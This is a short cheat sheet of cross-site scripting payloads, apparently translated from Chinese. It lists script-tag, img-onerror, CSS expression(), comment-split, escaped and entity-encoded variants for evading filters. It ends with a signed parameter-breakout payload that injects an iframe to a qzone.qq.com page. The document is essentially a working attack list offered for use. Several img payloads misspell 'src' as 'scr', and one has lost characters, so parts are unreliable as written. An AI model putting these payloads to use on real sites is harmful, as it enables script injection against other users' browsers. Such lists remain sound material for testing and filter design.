<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace inserted with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["